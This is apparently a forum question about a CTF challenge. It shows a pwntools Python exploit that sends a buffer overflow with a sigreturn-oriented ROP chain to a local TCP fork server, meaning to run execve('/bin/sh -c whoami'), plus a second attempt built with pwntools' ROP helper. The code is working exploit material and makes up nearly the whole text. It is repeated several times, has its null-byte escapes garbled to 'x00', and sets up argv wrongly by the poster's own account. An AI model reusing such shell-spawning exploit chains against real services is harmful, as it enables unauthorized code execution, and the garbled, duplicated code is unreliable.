I used sigreturn-oriented programming to solve a CTF challenge. I'm not able to build the argv[] array (the pointer passed in the rsi register) for the execve function.
Here is my Python code for the exploit:
<code>from pwn import *
program = context.binary = ELF('./TCPForkSocketServer_64Bit', checksec=False)
context.update(arch='amd64', os='linux')
libc = program.libc
libc.address = 0x00007ffff7d8b000
HOST = '127.0.0.1'
PORT = '10000'
#
bin_sh = libc.address + 0x1d8678
system = libc.address + 0x0000000000050d70
rax = 0x00000000004012aa # pop rax ; ret
rdi = 0x00000000004012b7 # pop rdi ; ret
xor = 0x00000000004012de # xor rax, rax ; ret
syscall = 0x00000000004012fc # syscall
ret = 0x000000000040101a # ret
write = 0x00000000004012ed # mov qword ptr [rdi], rax ; ret
where = program.bss()
#
frame_1 = SigreturnFrame()
frame_1.rax = 0x3b
frame_1.rdi = where
frame_1.rsi = where+100
frame_1.rdx = 0x0
frame_1.rip = syscall
chain_1 = b''
chain_1 += b'x00'*136 # chain_1 += b'B'*6
chain_1 += p64(rax)
chain_1 += b'/bin/shx00'
chain_1 += p64(rdi)
chain_1 += p64(where+100)
chain_1 += p64(write)
chain_1 += p64(rax)
chain_1 += b'-cx00'
chain_1 += p64(rdi)
chain_1 += p64(where+108)
chain_1 += p64(write)
chain_1 += p64(rax)
chain_1 += b'whoamix00'
chain_1 += p64(rdi)
chain_1 += p64(where+110)
chain_1 += p64(write)
chain_1 += p64(rax)
chain_1 += p64(0xf)
chain_1 += p64(syscall)
chain_1 += bytes(frame_1)
#
p = remote(HOST, PORT)
p.recvuntil(b'Hello, client.', timeout=5)
p.send(chain_1)
p.interactive()
</code>
<code>from pwn import *
program = context.binary = ELF('./TCPForkSocketServer_64Bit', checksec=False)
context.update(arch='amd64', os='linux')
libc = program.libc
libc.address = 0x00007ffff7d8b000
HOST = '127.0.0.1'
PORT = '10000'
#
bin_sh = libc.address + 0x1d8678
system = libc.address + 0x0000000000050d70
rax = 0x00000000004012aa # pop rax ; ret
rdi = 0x00000000004012b7 # pop rdi ; ret
xor = 0x00000000004012de # xor rax, rax ; ret
syscall = 0x00000000004012fc # syscall
ret = 0x000000000040101a # ret
write = 0x00000000004012ed # mov qword ptr [rdi], rax ; ret
where = program.bss()
#
frame_1 = SigreturnFrame()
frame_1.rax = 0x3b
frame_1.rdi = where
frame_1.rsi = where+100
frame_1.rdx = 0x0
frame_1.rip = syscall
chain_1 = b''
chain_1 += b'x00'*136 # chain_1 += b'B'*6
chain_1 += p64(rax)
chain_1 += b'/bin/shx00'
chain_1 += p64(rdi)
chain_1 += p64(where+100)
chain_1 += p64(write)
chain_1 += p64(rax)
chain_1 += b'-cx00'
chain_1 += p64(rdi)
chain_1 += p64(where+108)
chain_1 += p64(write)
chain_1 += p64(rax)
chain_1 += b'whoamix00'
chain_1 += p64(rdi)
chain_1 += p64(where+110)
chain_1 += p64(write)
chain_1 += p64(rax)
chain_1 += p64(0xf)
chain_1 += p64(syscall)
chain_1 += bytes(frame_1)
#
p = remote(HOST, PORT)
p.recvuntil(b'Hello, client.', timeout=5)
p.send(chain_1)
p.interactive()
</code>
from pwn import *
program = context.binary = ELF('./TCPForkSocketServer_64Bit', checksec=False)
context.update(arch='amd64', os='linux')
libc = program.libc
libc.address = 0x00007ffff7d8b000
HOST = '127.0.0.1'
PORT = '10000'
#
bin_sh = libc.address + 0x1d8678
system = libc.address + 0x0000000000050d70
rax = 0x00000000004012aa # pop rax ; ret
rdi = 0x00000000004012b7 # pop rdi ; ret
xor = 0x00000000004012de # xor rax, rax ; ret
syscall = 0x00000000004012fc # syscall
ret = 0x000000000040101a # ret
write = 0x00000000004012ed # mov qword ptr [rdi], rax ; ret
where = program.bss()
#
frame_1 = SigreturnFrame()
frame_1.rax = 0x3b
frame_1.rdi = where
frame_1.rsi = where+100
frame_1.rdx = 0x0
frame_1.rip = syscall
chain_1 = b''
chain_1 += b'x00'*136 # chain_1 += b'B'*6
chain_1 += p64(rax)
chain_1 += b'/bin/shx00'
chain_1 += p64(rdi)
chain_1 += p64(where+100)
chain_1 += p64(write)
chain_1 += p64(rax)
chain_1 += b'-cx00'
chain_1 += p64(rdi)
chain_1 += p64(where+108)
chain_1 += p64(write)
chain_1 += p64(rax)
chain_1 += b'whoamix00'
chain_1 += p64(rdi)
chain_1 += p64(where+110)
chain_1 += p64(write)
chain_1 += p64(rax)
chain_1 += p64(0xf)
chain_1 += p64(syscall)
chain_1 += bytes(frame_1)
#
p = remote(HOST, PORT)
p.recvuntil(b'Hello, client.', timeout=5)
p.send(chain_1)
p.interactive()
I tried the following code too; it seems to spawn a shell, but I want it to run the command whoami, and that command does not get called.
<code>rop = ROP(program, base=0x00007ffffffde000)
rop.call('execve', [bin_sh, [[b'/bin/sh'], [b'-c'], [b'whoami']], 0])
chain_1 = b''
chain_1 += b'x00'*136 # chain_1 += b'B'*6
chain_1 += rop.chain()
print(rop.dump())
</code>
<code>rop = ROP(program, base=0x00007ffffffde000)
rop.call('execve', [bin_sh, [[b'/bin/sh'], [b'-c'], [b'whoami']], 0])
chain_1 = b''
chain_1 += b'x00'*136 # chain_1 += b'B'*6
chain_1 += rop.chain()
print(rop.dump())
</code>
rop = ROP(program, base=0x00007ffffffde000)
rop.call('execve', [bin_sh, [[b'/bin/sh'], [b'-c'], [b'whoami']], 0])
chain_1 = b''
chain_1 += b'x00'*136 # chain_1 += b'B'*6
chain_1 += rop.chain()
print(rop.dump())